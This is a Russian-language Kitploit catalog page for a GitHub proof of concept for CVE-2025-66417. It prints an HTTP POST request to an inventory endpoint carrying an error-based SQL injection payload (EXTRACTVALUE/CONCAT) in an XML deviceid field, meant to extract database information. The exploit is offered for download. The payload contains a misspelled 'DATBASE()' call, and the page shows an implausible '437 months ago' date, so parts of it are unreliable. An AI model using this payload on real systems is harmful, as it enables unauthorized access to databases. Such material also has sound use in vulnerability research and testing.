Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-66417-POC — Доказательство концепции эксплуатации для CVE-2025-66417, демонстрирующее SQL-инъекцию через XML POST-запрос для извлечения информации из базы данных конечной точки инвентаризации веб-приложения. | Kitploit
Инструменты/GitHubGitHub/lem0naids/cve-2025-66417-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHublem0naids/cve-2025-66417-poc

CVE-2025-66417-POC

Доказательство концепции эксплуатации для CVE-2025-66417, демонстрирующее SQL-инъекцию через XML POST-запрос для извлечения информации из базы данных конечной точки инвентаризации веб-приложения.

Репозиторий
437 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-66417

POC CVE-2025-66417

root@kitploit:~
POST /front/inventory.php HTTP/1.1
Host: <>
Accept-Encoding: gzip, deflate, br
Accept: text/html
Connection: keep-alive
Content-Type: text/xml
Content-Length: 429

<?xml version="1.0" encoding="UTF-8"?>
<xml>
  <QUERY>get_params</QUERY>
  <deviceid><![CDATA[' AND EXTRACTVALUE(
  1,
  CONCAT(
    0x7e,
    IFNULL(
    (SELECT DATBASE()),
      'NONE'
    ),
    0x7e
  )
)-- -]]></deviceid>
  <content></content>
</xml>
Скачать инструмент